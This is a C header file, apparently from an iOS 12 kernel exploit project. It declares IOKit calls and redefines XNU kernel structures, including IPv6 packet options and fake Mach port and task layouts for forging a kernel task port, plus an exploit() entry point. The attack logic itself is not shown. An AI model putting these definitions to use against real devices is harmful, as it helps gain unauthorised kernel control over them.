//
//  exploit.h
//  se12.0exploit
//
//  Created by Justin Sherman on 1/13/20.
//  Copyright © 2020 Justin Sherman. All rights reserved.
//

#ifndef exploit_h
#define exploit_h

#include <CoreFoundation/CoreFoundation.h>
#include <mach/mach.h>
#include <netinet/in.h>

/* IOKit/IOTypes.h */
typedef mach_port_t	io_object_t;
typedef io_object_t	io_connect_t;
typedef io_object_t	io_enumerator_t;
typedef io_object_t	io_iterator_t;
typedef io_object_t	io_registry_entry_t;
typedef io_object_t	io_service_t;

#define	IO_OBJECT_NULL	((io_object_t) 0)

/* IOKit/IOKitLib.h */
extern const mach_port_t kIOMasterPortDefault;

extern CFMutableDictionaryRef IOServiceMatching(const char *name);

extern io_service_t IOServiceGetMatchingService(mach_port_t masterPort,
        CFDictionaryRef matching);

extern kern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask,
        uint32_t type, io_connect_t *connect);

extern kern_return_t IOConnectCallStructMethod(mach_port_t connection,
        uint32_t selector, const void *inputStruct, size_t inputStructCnt,
        void *outputStruct, size_t *outputStructCnt);

/* bsd/netinet6/in6.h */
#define IPV6_USE_MIN_MTU    42
#define	IPV6_TCLASS		36

/* bsd/netinet/in_pcb.h */
#define IP6PO_MINMTU_MCASTONLY  -1
#define IP6PO_MINMTU_DISABLE     0
#define IP6PO_MINMTU_ALL     1

#define	IPV6_3542PKTINFO	46 /* in6_pktinfo; send if, src addr */
#define	IPV6_3542HOPLIMIT	47 /* int; send hop limit */
#define	IPV6_3542NEXTHOP	48 /* sockaddr; next hop addr */
#define	IPV6_3542HOPOPTS	49 /* ip6_hbh; send hop-by-hop option */
#define	IPV6_3542DSTOPTS	50 /* ip6_dest; send dst option befor rthdr */
#define	IPV6_3542RTHDR		51 /* ip6_rthdr; send routing header */

#define	IPV6_PKTINFO	IPV6_3542PKTINFO

struct route_in6 {
    uint64_t ro_rt;
    uint64_t ro_lle;
    uint64_t ro_srcia;
    uint32_t ro_flags;
    struct sockaddr_in6 ro_dst;
};

struct ip6_pktopts {
    uint64_t ip6po_m;
    int ip6po_hlim;
    uint64_t ip6po_pktinfo;
    struct {
        uint64_t ip6po_nhi_nexthop;
        struct route_in6 ip6po_nhi_route;
    } ip6po_nhinfo;
    uint64_t ip6po_hbh;
    uint64_t ip6po_dest1;
    struct {
        uint64_t ip6po_rhi_rthdr;
        struct route_in6 ip6po_rhi_route;
    } ip6po_rhinfo;
    uint64_t ip6po_dest2;
    int ip6po_tclass;
    int ip6po_minmtu;
    int ip6po_prefer_tempaddr;
    int ip6po_flags;
};

struct ipc_entry {
    uint64_t ie_object;
    uint32_t ie_bits;
    uint32_t ie_index;
    union {
        uint32_t next;
        uint32_t request;
    } index;
};

struct ipc_space {
    struct {
        uint64_t data;
        uint32_t type;
        uint32_t pad;
    } is_lock_data;
    uint32_t is_bits;
    uint32_t is_table_size;
    uint32_t is_table_free;
    uint64_t is_table;
    uint64_t is_task;

    /* other stuff that isn't needed */
};

/* siguza */
typedef struct {
    uint32_t ip_bits;
    uint32_t ip_references;
    struct {
        uint64_t data;
        uint32_t type;
        uint32_t pad;
    } ip_lock;
    struct {
        struct {
            struct {
                uint32_t flags;
                uint32_t waitq_interlock;
                uint64_t waitq_set_id;
                uint64_t waitq_prepost_id;
                struct {
                    uint64_t next;
                    uint64_t prev;
                } waitq_queue;
            } waitq;
            uint64_t messages;
            uint32_t seqno;
            uint32_t receiver_name;
            uint16_t msgcount;
            uint16_t qlimit;
            uint32_t pad;
        } port;
        uint64_t klist;
    } ip_messages;
    uint64_t ip_receiver;
    uint64_t ip_kobject;
    uint64_t ip_nsrequest;
    uint64_t ip_pdrequest;
    uint64_t ip_requests;
    uint64_t ip_premsg;
    uint64_t ip_context;
    uint32_t ip_flags;
    uint32_t ip_mscount;
    uint32_t ip_srights;
    uint32_t ip_sorights;
} kport_t;

/* siguza */
typedef struct
{
    struct {
        uint64_t data;
        uint32_t reserved : 24,
                 type     :  8;
        uint32_t pad;
    } lock;
    uint32_t ref_count;
    uint32_t active;
    uint32_t halting;
    uint32_t pad;
    uint64_t map;
} ktask_t;

/* libkern/libkern/OSSerializeBinary.h */
enum {
    kOSSerializeDictionary      = 0x01000000U,
    kOSSerializeArray           = 0x02000000U,
    kOSSerializeSet             = 0x03000000U,
    kOSSerializeNumber          = 0x04000000U,
    kOSSerializeSymbol          = 0x08000000U,
    kOSSerializeString          = 0x09000000U,
    kOSSerializeData            = 0x0a000000U,
    kOSSerializeBoolean         = 0x0b000000U,
    kOSSerializeObject          = 0x0c000000U,
    kOSSerializeTypeMask        = 0x7F000000U,
    kOSSerializeDataMask        = 0x00FFFFFFU,
    kOSSerializeEndCollection   = 0x80000000U,
    kOSSerializeBinarySignature = 0x000000d3U,
};

enum {
    IOSURFACE_CREATE = 0
};

/* file types */
typedef enum {
    DTYPE_VNODE 	= 1,	/* file */
    DTYPE_SOCKET,		/* communications endpoint */
    DTYPE_PSXSHM,		/* POSIX Shared memory */
    DTYPE_PSXSEM,		/* POSIX Semaphores */
    DTYPE_KQUEUE,		/* kqueue */
    DTYPE_PIPE,		/* pipe */
    DTYPE_FSEVENTS,		/* fsevents */
    DTYPE_ATALK,		/* (obsolete) */
    DTYPE_NETPOLICY,	/* networking policy */
} file_type_t;

#define IO_BITS_ACTIVE      0x80000000
#define IOT_PORT            0
#define IKOT_NONE           0
#define IKOT_TASK           2

#define	io_makebits(active, otype, kotype)	\
    (((active) ? IO_BITS_ACTIVE : 0) | ((otype) << 16) | (kotype))

#define	OPEN_MAX		10240

#define	MACH_PORT_INDEX(name)		((name) >> 8)

int exploit(mach_port_t *);

#endif /* exploit_h */
